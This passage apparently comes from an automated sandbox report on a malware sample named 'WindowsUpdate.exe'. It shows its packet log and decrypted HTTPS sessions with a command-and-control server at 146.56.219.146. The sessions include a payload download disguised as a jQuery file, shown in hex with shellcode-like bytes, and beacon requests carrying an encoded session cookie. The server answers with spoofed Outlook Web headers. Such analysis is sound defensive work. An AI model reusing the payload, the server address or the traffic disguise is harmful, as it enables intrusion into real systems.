Dec 18, 2024 22:53:30.194819927 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195097923 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195282936 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195372105 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195389986 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195441008 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195478916 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195501089 CET44349816146.56.219.146192.168.2.4
Dec 18, 2024 22:53:30.195530891 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195530891 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:30.195590973 CET49816443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.804744005 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.804775953 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:34.804862976 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.805120945 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:34.805136919 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:36.668251991 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:36.668368101 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:36.668749094 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:36.668756008 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:36.669976950 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:36.669982910 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.398691893 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.398763895 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.399461031 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.399534941 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.399558067 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.399604082 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.399610996 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:37.399662018 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.406042099 CET49835443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:37.406053066 CET44349835146.56.219.146192.168.2.4
Dec 18, 2024 22:53:42.133281946 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:42.133354902 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:42.133459091 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:42.133737087 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:42.133758068 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:43.978401899 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:43.978487015 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:43.978959084 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:43.978987932 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:43.980150938 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:43.980165958 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.713480949 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.713748932 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.714238882 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.714313984 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.714346886 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.714384079 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:44.714442015 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.734730959 CET49853443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:44.734761953 CET44349853146.56.219.146192.168.2.4
Dec 18, 2024 22:53:49.305309057 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:49.305373907 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:49.305484056 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:49.305809021 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:49.305824995 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.218111038 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.218394041 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.219022989 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.219033957 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.220444918 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.220454931 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.993292093 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.993386984 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.994168997 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.994247913 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.994256973 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.994306087 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:51.994313955 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:51.994368076 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:52.006045103 CET49869443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:52.006057978 CET44349869146.56.219.146192.168.2.4
Dec 18, 2024 22:53:56.664669991 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:56.664721012 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:56.664825916 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:56.665266991 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:56.665282011 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:58.505497932 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:58.505604029 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:58.507895947 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:58.507901907 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:58.509628057 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:58.509634018 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.238643885 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.238797903 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:59.239408970 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.239490986 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:53:59.239628077 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:59.247819901 CET49886443192.168.2.4146.56.219.146
Dec 18, 2024 22:53:59.247844934 CET44349886146.56.219.146192.168.2.4
Dec 18, 2024 22:54:03.773993015 CET49905443192.168.2.4146.56.219.146
Dec 18, 2024 22:54:03.774029016 CET44349905146.56.219.146192.168.2.4
Dec 18, 2024 22:54:03.774113894 CET49905443192.168.2.4146.56.219.146
Dec 18, 2024 22:54:03.774346113 CET49905443192.168.2.4146.56.219.146
Dec 18, 2024 22:54:03.774354935 CET44349905146.56.219.146192.168.2.4
Dec 18, 2024 22:54:05.618865013 CET44349905146.56.219.146192.168.2.4
Dec 18, 2024 22:54:05.618971109 CET49905443192.168.2.4146.56.219.146

HTTP Request Dependency Graph

  • 146.56.219.146

HTTPS Proxied Packets

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.449731146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:03 UTC242OUTGET /res/js/jquery-3.6.2.slim.min.js HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:04 UTC170INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:03 GMT
Content-Type: application/octet-stream
Content-Length: 458323
Server: nginx
content-transfer-encoding: binary
2024-12-18 21:52:04 UTC8192INData Raw: fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02 eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 4f fe 5d 14 43 00 5b 14 df 6e cd 84 4f fe 80 de 0e ac d5 96 87 49 9d 17 6b 79 9d 17 6b 31 10 0a 81 ce ef f5 c9 47 30 bd 48 84 a0 46 48 84 5f 95 09 3c af 20 ab 6a c7 24 ab 6a c7 7e e3 e3 3e 81 33 e3 3e 81 33 e3 3e 81 33 e3 3e 80 33 e3 32 dd e2 13 75 36 d1 d4 31 5e 6a 5e 19 25 8d 13 b1 2b 3f 62 e9 e7 66 0b dd dc d3 2d b4 d9 28 96 7f 3d 98 4c 79 8a 9d 4a d8 c1 ed 38 b2 80 8d e4 cc 0d d9 62 e4 50 7b be e8 86 16 49 0d 70 bb 64 c5 15 44 8b 23 6c 16 33 75 ad 01 cd d1 a6 ed a4 90 c2 0c 77 54 68 2e 0c 26 f5 8d 2e 05 5b 72 ef e1 c3 f7 de 3f 97 66 da 63 ce fc 3d 17 c8 21 be 3e 9e
Data Ascii: H3]EHM1HUU1U1H19tXHO]C[nOIkyk1G0HFH_< j$j~>3>3>3>32u61^j^%+?bf-(=LyJ8bP{IpdD#l3uwTh.&.[r?fc=!>
2024-12-18 21:52:04 UTC8192INData Raw: 03 71 4b 65 90 fa 8b ac 1b b2 b1 27 53 05 56 bc d8 4d 5d 8c bf c6 15 0b 58 55 5d 88 93 95 da 6f 30 1e 92 e0 d7 8d d8 62 1c 06 90 e5 fb 95 d8 66 30 d5 f3 ad 78 de d8 80 1a 1e 1b ca 9d f9 f8 41 d5 7e 1f d2 5e 36 dc 9a d1 d1 3f d0 5a 16 b4 90 5d ed 28 0d 5d e2 27 02 52 ed 28 0d 5d a7 bf ea 8e 2c f5 65 69 e7 7e 25 46 0c 36 aa a1 f7 1d c3 c3 37 de 89 44 d0 25 0b 3f 17 e6 c8 fc 9c a8 5f 1b 67 23 17 94 80 d0 3c 66 bc ec 00 ed fc eb eb ed f3 e4 e4 e2 fc eb eb ed f3 e4 e4 e2 56 ae 73 05 85 25 39 8a 62 ee b2 ca 4d 05 7e be c2 e2 85 95 6f 80 45 56 ca ca c2 b1 31 48 b9 70 f2 8b 7a fb bc 1c 9d 00 37 54 12 e7 c4 7f 3f da f8 43 b4 9a ff a8 b4 95 f0 a7 bb 9a ff a8 b4 95 78 e2 33 72 a3 69 79 e5 44 ba f2 af cb 5d 39 24 8b 72 c2 6c 45 c6 82 a9 86 ed 63 cb 46 2e 29 4c a1 cd
Data Ascii: qKe'SVM]XU]o0bf0xA~^6?Z](]'R(],ei~%F67D%?_g#<fVs%9bM~oEV1Hpz7T?Cx3riyD]9$rlEcF.)L
2024-12-18 21:52:04 UTC8192INData Raw: 6f 0c a5 46 e4 42 22 a1 57 c9 6a 9a a7 ca 10 31 64 09 d3 01 0d 0d 54 e6 be a6 97 25 7d 2d d9 a2 9a b6 52 ea a1 46 51 90 7a 85 92 53 4a ec 19 57 cd 0b 92 94 0e c8 51 90 89 2f d2 4b 4a ec 11 4f cd 0b 82 8d 0e c8 41 0f 74 0b 82 dc b7 84 cc 5b 50 07 47 15 c7 e0 b4 9e 89 6f 53 65 b5 b9 13 70 72 7a 98 3e fd 9d 2b 02 2b 36 3e c5 e8 32 79 22 87 f1 ba e1 45 33 79 22 b5 30 dc 68 f2 d7 af ab 31 14 24 e3 b6 f3 d7 68 fc b4 30 63 3f 77 f3 e8 77 f0 14 1b fc ba 53 fc ef 79 90 3f 64 7d d7 d8 67 be 14 1b a4 7d d7 d8 a0 fa 30 33 63 39 f3 f0 67 be 14 13 b4 7d d7 d0 3b 33 58 37 a0 bc 16 b0 47 0f 5e e7 a0 e4 9c 24 63 6f d4 6b 84 8c 16 a8 47 a7 f2 fd 84 64 b4 fe 32 a5 9c 7c 4b 76 78 bf 88 fd 30 30 6f 66 0c e6 8d 73 cb 25 06 3d 8c c2 25 fe 4f 01 ae b0 c0 e6 35 3b 88 dd be 73 ba
Data Ascii: oFB"Wj1dT%}-RFQzSJWQ/KJOAt[PGoSeprz>++6>2y"E3y"0h1$h0c?wwSy?d}g}03c9g};3X7G^$cokGd2|Kvx00ofs%=%O5;s
2024-12-18 21:52:04 UTC8192INData Raw: fd 18 60 cd 27 d9 a3 0e c1 dc e4 e9 18 1d 27 2a eb 18 60 cd 33 d9 a3 0e c2 dc e4 e9 1d 1d 27 2a ba 18 60 cd 64 d9 a3 0e 88 dc e4 e9 55 1d 27 2a b3 18 60 cd 6f d9 a3 0e 9c dc e4 e9 7f 1d 27 2a 8e 18 60 cd 6c d9 a3 0e cb dc e4 e9 2a 1d 27 2a c9 18 60 cd 29 d9 a3 0e cf dc e4 e9 28 1d 27 2a db 18 60 cd 3d d9 a3 0e cc dc e4 e9 29 1d 27 2a 8e 18 60 cd 6a d9 a3 0e 93 dc e4 e9 78 1d 27 2a 9e 18 60 cd 74 d9 a3 0e 87 dc e4 e9 6e 1d 27 2a 9f 18 60 cd 77 d9 a3 0e d0 dc e4 e9 3f 1d 27 2a c6 18 60 cd 28 d9 a3 0e ce dc e4 e9 23 1d 27 2a d0 18 60 cd 3c d9 a3 0e cd dc e4 e9 3e 1d 27 2a 99 18 60 cd 6b d9 a3 0e a1 dc e4 e9 50 1d 27 2a b6 18 60 cd 46 d9 a3 0e f6 dc e4 e9 01 1d 27 2a c8 18 60 cd 3e d9 a3 0e fd dc e4 e9 06 1d 27 2a 83 18 60 cd 79 d9 a3 0e b3 dc e4 e9 4a 1d 27
Data Ascii: `''*`3'*`dU'*`o'*`l*'*`)('*`=)'*`jx'*`tn'*`w?'*`(#'*`<>'*`kP'*`F'*`>'*`yJ'
2024-12-18 21:52:04 UTC8192INData Raw: a1 bd e5 9d 60 7e 26 5e d6 b3 ad 16 51 54 3e 12 d2 8f fd d1 11 4c d5 3c 9a 48 52 db 71 8b 91 18 b2 8f 16 ff 51 4c d5 3c 92 c7 9d bb 75 54 12 f3 fe 9f 99 bb 79 78 0a 34 31 bb fa 25 c1 b1 71 6d 46 56 e2 51 d5 85 69 11 d2 0e 69 1e dd 81 23 99 3a 5a 69 0e dd 89 e2 44 52 6e 29 d1 c6 e5 69 fe 5d 6e 27 38 7b 52 1b 04 f0 1c d5 99 cc 20 e9 12 24 22 a3 95 c3 d1 28 91 44 36 a3 52 87 f5 60 1a 00 12 93 91 40 11 70 db c7 f6 87 93 40 11 74 18 00 12 97 93 48 19 bc ba d6 d9 7f 31 9c 5e 98 ca 17 16 27 2d ec 9d 6f 5a 0b de ac 99 c8 a4 4f 5a 0b 67 7f 3d 43 e0 98 ce c8 a8 17 29 33 23 57 2b d0 a8 19 fd 16 94 25 c1 9d dc 1f 4a d5 ed 57 41 e5 8a 1f c6 02 7d 1b 41 e5 9e 98 82 26 5d 1a f8 e5 ae d9 3b 62 e6 da cb 73 6d 92 44 94 de ae 92 2e 89 69 51 a5 c3 ee b6 26 48 ae 09 c1 cb 6d
Data Ascii: `~&^QT>L<HRqQL<uTyx41%qmFVQii#:ZiDRn)i]n'8{R $"(D6R`@p@tH1^'-oZOZg=C)3#W+%JWA}A&];bsmD.iQ&Hm
2024-12-18 21:52:04 UTC8192INData Raw: 1e 65 f7 93 98 95 f4 63 89 1e bc 68 06 56 33 8f 95 dd 7b 08 72 46 f9 34 e5 84 1a 7e 62 63 f5 3e dd 84 1a fd 6b 51 91 b5 3c b6 f2 76 ff 75 ba f9 18 9e 91 6c de 5d 52 46 03 9f 91 85 88 d7 57 ac 6e 12 94 e4 e1 f5 67 ae 2a 7e c7 29 cd 9d 4c 81 ce 3e c7 cf 00 19 21 0a c3 92 6f 8d 01 59 e4 2d 8e be 07 a6 26 b4 a4 2d 6c 3b 43 86 e7 75 95 8f 01 b0 56 04 4b 27 b1 a7 32 04 e1 60 f1 8f a9 6b 7e c7 2e 8c dd 4c 66 0b 3a e7 e4 37 ad 24 1f 71 ae 93 84 fa e6 55 d4 1c 23 96 5f 5c 20 51 d4 fc af b6 37 77 07 bc 94 fc 49 6a d8 1a 8c a9 53 54 03 60 98 df a3 f7 7f 3c 28 5f 6e 9f a3 15 f9 78 18 9a b7 be ae 7c 72 7d 21 36 f5 9a 92 b4 8e a5 ae 78 4d 2e e6 6b c2 66 69 8c 71 ed 21 0b 96 56 a3 37 01 94 78 7d 86 73 9f 55 4d 77 18 b2 aa 4b 24 8e 96 0b 9b 69 71 c8 26 8b fa 68 a1 6c 1d
Data Ascii: echV3{rF4~bc>kQ<vul]RFWng*~)L>!oY-&-l;CuVK'2`k~.Lf:7$qU#_\ Q7wIjST`<(_nx|r}!6xM.kfiq!V7x}sUMwK$iq&hl
2024-12-18 21:52:04 UTC8192INData Raw: 67 b4 c6 a2 68 bb c9 ad 67 b4 c6 a2 68 3b 8c 25 8f e0 c6 b2 68 33 4d f8 e7 d4 86 6d 73 5f c4 42 c8 98 07 81 43 d0 c1 60 7b 16 02 eb 8b 11 89 a1 cc f6 2a 66 0f 35 a1 62 88 d2 5a a1 4b 11 99 2a 4f 96 7e d9 73 aa 42 e5 77 2d a5 0e b4 ee 66 cd b0 69 81 2a 73 aa 42 e9 83 a9 e7 a3 04 4e 04 a7 83 a9 eb 64 40 6a 28 60 c7 8d ab a2 04 4e 68 29 4c 09 8f 7a 8b ca 4c 32 48 80 cb d5 a3 0b 83 92 44 58 44 51 87 d3 04 52 40 58 4e 15 a7 0b 89 d6 64 80 29 91 83 db ee 52 40 50 ae 79 87 1a e9 9e dc dd 2a 5d 94 5a cd b6 de dd 2a 51 96 52 cd ba aa 84 01 20 6d 47 4b a7 8a ac c0 ef cd 4b 93 28 0e 88 5f 5c cd 2d 15 db 2a ce 9e 93 6d 29 cd 54 ae ea 46 14 ad 2b cd 5e ea cc 9e 99 29 0f 15 39 6e e8 4e fe ad 2b c5 be 86 ea 8f f9 61 b1 48 3a a2 7d 3c b5 45 9e 00 63 37 05 c7 a0 92 4f 40
Data Ascii: ghgh;%h3Mms_BC`{*f5bZK*O~sBw-fi*sBNd@j(`Nh)LzL2HDXDQR@XNd)R@Py*]Z*QR mGKK(_\-*m)TF+^)9nN+aH:}<Ec7O@
2024-12-18 21:52:04 UTC8192INData Raw: 5b 3c 94 8a 9b ff 57 01 d5 b8 b0 32 16 7b 73 b9 5e 40 83 ba 24 83 44 79 e7 b3 2d fb 9c 70 ea 38 5f fb a4 6f b8 c8 67 ac 7b 43 29 e3 9c 00 ea 20 5f 2b 4e 3f 63 17 04 b8 84 e0 8f f6 c3 07 bc 35 00 c4 37 7f 87 23 d4 f4 cf 64 33 2f 09 a7 f0 a0 41 6c 7f ee 87 ab 75 28 44 d2 b6 ef 87 11 3d a7 c0 f6 e6 61 03 35 6d 29 88 c6 46 c8 63 fa 7a 43 2b bd 9d 98 ed 7e 5e 13 a5 fd ad 98 ed b2 4a 43 2b 71 89 c8 63 bb 02 80 59 30 4a b3 23 f3 8d 70 e0 c3 ea 5a 15 03 29 99 9e 4d 6e 7e ad 8e ad bd 26 c6 96 4d 25 bc 55 8a e6 7f 65 e3 64 04 a6 24 a7 c7 2d 6a f0 20 1e a9 33 e3 95 e7 7c 04 d6 24 bf c7 fd 31 a7 fb c1 7b 20 1c 36 f0 60 a3 d1 7b a3 14 66 f0 eb 93 81 7b 60 d9 c6 9c 73 1a 05 5f f8 1e 82 b8 4b 22 be 84 77 a9 82 03 90 1a 09 4b d7 fd 1a 88 14 3e 91 c0 9b d9 22 83 64 12 e1
Data Ascii: [<W2{s^@$Dy-p8_og{C) _+N?c57#d3/Alu(D=a5m)FczC+~^JC+qcY0J#pZ)Mn~&M%Ued$-j 3|$1{ 6`{f{`s_K"wK>"d
2024-12-18 21:52:04 UTC8192INData Raw: 34 47 42 2f 82 47 c1 d7 e3 3b de 9f 68 7f fa af 67 c9 fa 2c 8f e9 b2 b4 c7 62 fe 90 e7 2a fd 58 af a1 3c 10 26 e5 18 30 cd fd 50 bb 89 d9 60 b4 3f d9 28 3f 73 fd 08 77 70 35 40 fc b1 7d c9 b8 95 5d 81 33 d1 79 b1 7b 2e b9 f9 f2 6a 9d c9 fd dd 99 ed 9b 22 51 8b 12 26 75 84 a5 22 51 01 65 57 df 80 19 73 ff db a5 39 95 ae a7 d2 87 e6 2c 96 a3 ce 64 1d a3 86 ed 59 87 ae 04 19 78 51 fb 51 f3 15 df 79 bb 9e 9f 59 f3 17 db 7d fb 5f 50 39 df 57 18 5a 9f 6b 50 d1 d3 4f 58 99 d0 87 10 12 11 cf 99 56 35 f7 21 5e 35 f7 21 16 5e 37 21 5e d5 7b 05 66 9d f6 81 67 15 f6 81 67 5d 7f c5 43 1d 37 4e 07 39 77 c5 07 71 fc 89 23 79 b4 8a eb 31 3f 4b a3 b8 7b 6f 9b f0 f0 2b bf c8 7b 6b 9f 80 f0 27 bb 88 b8 24 73 c0 33 e5 3b 49 77 c1 7b 01 fc 85 5f 39 77 c5 7b 71 fc 89 5f 79 b4
Data Ascii: 4GB/G;hg,b*X<&0P`?(?swp5@}]3y{.j"Q&u"QeWs9,dYxQQyY}_P9WZkPOXV5!^5!^7!^{fgg]C7N9wq#y1?K{o+{k'$s3;Iw{_9w{q_y
2024-12-18 21:52:04 UTC8192INData Raw: 80 59 7f 36 b2 23 ac f5 71 e0 9c 92 f3 9b df 51 30 58 54 1f e6 c7 22 d9 25 4c 6c 17 6b 3a aa d4 40 01 54 17 83 4b d3 f0 70 0b 6c 17 83 c8 db de f9 0a 18 1d 3a 21 9c 01 fb e2 17 a1 bc 05 5c 62 7f c6 d7 2a 30 21 94 e9 f3 e2 1f a3 7c 05 f4 28 34 4a 13 6b f7 89 d0 e0 bd 06 37 03 32 48 b8 e4 b1 c7 f0 e7 c8 05 33 24 0b 8e 7d ea f5 f8 bb 29 de 13 4a ea 1d 59 cd 0d ee 19 72 ea 1d da c5 23 67 18 06 e0 a4 33 32 fd 65 f0 1a 26 a9 8c dc 3f de 4a 1f 7f e5 88 a9 be cd 41 d3 7c 0e 82 10 57 10 9f d1 94 9b 3f 96 73 d0 fc 55 b0 5b b4 1a 57 18 77 d9 94 93 b7 d2 1f db b5 59 51 54 52 a2 da 1e dd 45 31 95 97 c2 d6 76 10 8a 99 91 5b 49 5a 52 d4 01 1d b5 97 c2 de 76 ee 11 1d b5 2d 9a 53 7b 4e ed 95 b8 65 ed a6 84 59 a7 21 63 aa e7 9e 84 59 24 29 4d 23 e6 ea 8e e0 cd ab 93 21 0e
Data Ascii: Y6#qQ0XT"%Llk:@TKpl:!\b*0!|(4Jk72H3$})JYr#g32e&?JA|W?sU[WwYQTRE1v[IZRv-S{NeY!cY$)M#!


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.449732146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:07 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:07 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:07 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:07 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.449733146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:14 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:15 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:15 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:15 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.449736146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
